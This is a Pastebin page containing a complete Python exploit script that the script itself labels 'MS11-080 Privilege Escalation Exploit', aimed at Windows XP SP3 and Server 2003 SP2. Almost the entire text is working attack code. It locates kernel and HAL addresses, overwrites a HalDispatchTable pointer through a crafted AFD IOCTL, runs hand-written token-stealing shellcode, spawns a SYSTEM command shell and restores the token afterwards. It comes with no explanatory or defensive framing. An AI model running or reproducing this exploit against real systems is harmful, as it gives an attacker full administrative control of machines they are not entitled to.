API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 19th, 2019
126
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.73 KB | None | 0 0
raw download clone embed print report
  1. from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
  2. c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
  3. c_void_p, c_long, c_char_p)
  4. from ctypes.wintypes import HANDLE, DWORD
  5. import socket, time, os, struct, sys
  6. from optparse import OptionParser
  7.  
  8. usage = "%prog -O TARGET_OS"
  9. parser = OptionParser(usage=usage)
  10. parser.add_option("-O", "--target-os", type="string",
  11. action="store", dest="target_os",
  12. help="Target OS. Accepted values: XP, 2K3")
  13. (options, args) = parser.parse_args()
  14. OS = options.target_os
  15. if not OS or OS.upper() not in ['XP','2K3']:
  16. parser.print_help()
  17. sys.exit()
  18. OS = OS.upper()
  19.  
  20. kernel32 = windll.kernel32
  21. ntdll = windll.ntdll
  22. Psapi = windll.Psapi
  23.  
  24. def findSysBase(drvname=None):
  25. ARRAY_SIZE = 1024
  26. myarray = c_ulong * ARRAY_SIZE
  27. lpImageBase = myarray()
  28. cb = c_int(1024)
  29. lpcbNeeded = c_long()
  30. drivername_size = c_long()
  31. drivername_size.value = 48
  32. Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded))
  33. for baseaddy in lpImageBase:
  34. drivername = c_char_p("\x00"*drivername_size.value)
  35. if baseaddy:
  36. Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername,
  37. drivername_size.value)
  38. if drvname:
  39. if drivername.value.lower() == drvname:
  40. print "[+] Retrieving %s info..." % drvname
  41. print "[+] %s base address: %s" % (drvname, hex(baseaddy))
  42. return baseaddy
  43. else:
  44. if drivername.value.lower().find("krnl") !=-1:
  45. print "[+] Retrieving Kernel info..."
  46. print "[+] Kernel version:", drivername.value
  47. print "[+] Kernel base address: %s" % hex(baseaddy)
  48. return (baseaddy, drivername.value)
  49. return None
  50.  
  51. print "[>] MS11-080 Privilege Escalation Exploit"
  52. print "[>] Matteo Memelli - ryujin@offsec.com"
  53. print "[>] Release Date 28/11/2011"
  54.  
  55. WSAGetLastError = windll.Ws2_32.WSAGetLastError
  56. WSAGetLastError.argtypes = ()
  57. WSAGetLastError.restype = c_int
  58. SOCKET = c_int
  59. WSASocket = windll.Ws2_32.WSASocketA
  60. WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
  61. WSASocket.restype = SOCKET
  62. closesocket = windll.Ws2_32.closesocket
  63. closesocket.argtypes = (SOCKET,)
  64. closesocket.restype = c_int
  65. connect = windll.Ws2_32.connect
  66. connect.argtypes = (SOCKET, c_void_p, c_int)
  67. connect.restype = c_int
  68.  
  69. class sockaddr_in(Structure):
  70. _fields_ = [
  71. ("sin_family", c_short),
  72. ("sin_port", c_ushort),
  73. ("sin_addr", c_ulong),
  74. ("sin_zero", c_char * 8),
  75. ]
  76.  
  77. ## Create our deviceiocontrol socket handle
  78. client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
  79. None, 0, 0)
  80. if client == ~0:
  81. raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
  82. try:
  83. addr = sockaddr_in()
  84. addr.sin_family = socket.AF_INET
  85. addr.sin_port = socket.htons(4455)
  86. addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
  87. ## We need to connect to a closed port, socket state must be CONNECTING
  88. connect(client, byref(addr), sizeof(addr))
  89. except:
  90. closesocket(client)
  91. raise
  92.  
  93. baseadd = c_int(0x1001)
  94. MEMRES = (0x1000 | 0x2000)
  95. PAGEEXE = 0x00000040
  96. Zerobits = c_int(0)
  97. RegionSize = c_int(0x1000)
  98. written = c_int(0)
  99. ## This will trigger the path to AfdRestartJoin
  100. irpstuff = ("\x41\x41\x41\x41\x42\x42\x42\x42"
  101. "\x00\x00\x00\x00\x44\x44\x44\x44"
  102. "\x01\x00\x00\x00"
  103. "\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
  104. ## Allocate space for the input buffer
  105. dwStatus = ntdll.NtAllocateVirtualMemory(-1,
  106. byref(baseadd),
  107. 0x0,
  108. byref(RegionSize),
  109. MEMRES,
  110. PAGEEXE)
  111. # Copy input buffer to it
  112. kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
  113. startPage = c_int(0x00020000)
  114. kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
  115. ################################# KERNEL INFO ##################################
  116. lpDriver = c_char_p()
  117. lpPath = c_char_p()
  118. lpDrvAddress = c_long()
  119. (krnlbase, kernelver) = findSysBase()
  120. hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
  121. HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
  122. HalDispatchTable -= hKernel
  123. HalDispatchTable += krnlbase
  124. print "[+] HalDispatchTable address:", hex(HalDispatchTable)
  125. halbase = findSysBase("hal.dll")
  126. ## WinXP SP3
  127. if OS == "XP":
  128. HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
  129. HalpSetSystemInformation = halbase+0x19436 # Offset for XPSP3
  130. ## Win2k3 SP2
  131. else:
  132. HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
  133. HalpSetSystemInformation = halbase+0x21c60 # Offset for WIN2K3
  134. print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
  135. print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
  136.  
  137. ################################# EXPLOITATION #################################
  138. shellcode_address_dep = 0x0002071e
  139. shellcode_address_nodep = 0x000207b8
  140. padding = "\x90"*2
  141. HalDispatchTable0x4 = HalDispatchTable + 0x4
  142. HalDispatchTable0x8 = HalDispatchTable + 0x8
  143. ## tokenbkaddr = 0x00020900
  144. if OS == "XP":
  145. _KPROCESS = "\x44"
  146. _TOKEN = "\xc8"
  147. _UPID = "\x84"
  148. _APLINKS = "\x88"
  149. else:
  150. _KPROCESS = "\x38"
  151. _TOKEN = "\xd8"
  152. _UPID = "\x94"
  153. _APLINKS = "\x98"
  154.  
  155. restore_ptrs = "\x31\xc0" + \
  156. "\xb8" + struct.pack("L", HalpSetSystemInformation) + \
  157. "\xa3" + struct.pack("L", HalDispatchTable0x8) + \
  158. "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
  159. "\xa3" + struct.pack("L", HalDispatchTable0x4)
  160. tokenstealing = "\x52" +\
  161. "\x53" +\
  162. "\x33\xc0" +\
  163. "\x64\x8b\x80\x24\x01\x00\x00" +\
  164. "\x8b\x40" + _KPROCESS +\
  165. "\x8b\xc8" +\
  166. "\x8b\x98" + _TOKEN + "\x00\x00\x00" +\
  167. "\x89\x1d\x00\x09\x02\x00" +\
  168. "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
  169. "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
  170. "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
  171. "\x75\xe8" +\
  172. "\x8b\x90" + _TOKEN + "\x00\x00\x00" +\
  173. "\x8b\xc1" +\
  174. "\x89\x90" + _TOKEN + "\x00\x00\x00" +\
  175. "\x5b" +\
  176. "\x5a" +\
  177. "\xc2\x10"
  178. restore_token = "\x52" +\
  179. "\x33\xc0" +\
  180. "\x64\x8b\x80\x24\x01\x00\x00" +\
  181. "\x8b\x40" + _KPROCESS +\
  182. "\x8b\x15\x00\x09\x02\x00" +\
  183. "\x89\x90" + _TOKEN + "\x00\x00\x00" +\
  184. "\x5a" +\
  185. "\xc2\x10"
  186.  
  187. shellcode = padding + restore_ptrs + tokenstealing
  188. shellcode_size = len(shellcode)
  189. orig_size = shellcode_size
  190. # Write shellcode in userspace (dep)
  191. kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
  192. shellcode_size, byref(written))
  193. # Write shellcode in userspace *(nodep)
  194. kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
  195. shellcode_size, byref(written))
  196. ## Trigger Pointer Overwrite
  197. print "[*] Triggering AFDJoinLeaf pointer overwrite..."
  198. IOCTL = 0x000120bb # AFDJoinLeaf
  199. inputbuffer = 0x1004
  200. inputbuffer_size = 0x108
  201. outputbuffer_size = 0x0 # Bypass Probe for Write
  202. outputbuffer = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
  203. IoStatusBlock = c_ulong()
  204. NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
  205. None,
  206. None,
  207. None,
  208. byref(IoStatusBlock),
  209. IOCTL,
  210. inputbuffer,
  211. inputbuffer_size,
  212. outputbuffer,
  213. outputbuffer_size
  214. )
  215. ## Trigger shellcode
  216. inp = c_ulong()
  217. out = c_ulong()
  218. inp = 0x1337
  219. hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
  220. ## Spawn a system shell, w00t!
  221. print "[*] Spawning a SYSTEM shell..."
  222. os.system("cmd.exe /T:C0 /K cd c:\\windows\\system32")
  223.  
  224. ############################## POST EXPLOITATION ###############################
  225. print "[*] Restoring token..."
  226. ## Restore the thingie
  227. shellcode = padding + restore_ptrs + restore_token
  228. shellcode_size = len(shellcode)
  229. trail_padding = (orig_size - shellcode_size) * "\x00"
  230. shellcode += trail_padding
  231. shellcode_size += (orig_size - shellcode_size)
  232. ## Write restore shellcode in userspace (dep)
  233. kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
  234. shellcode_size, byref(written))
  235. ## Write restore shellcode in userspace (nodep)
  236. kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
  237. shellcode_size, byref(written))
  238. ## Overwrite HalDispatchTable once again
  239. NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
  240. None,
  241. None,
  242. None,
  243. byref(IoStatusBlock),
  244. IOCTL,
  245. inputbuffer,
  246. inputbuffer_size,
  247. outputbuffer,
  248. outputbuffer_size
  249. )
  250. ## Trigger restore shellcode
  251. hola = ntdll.NtQueryIntervalProfile(inp, byref(out))
  252. print "[+] Restore done! Have a nice day :)"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!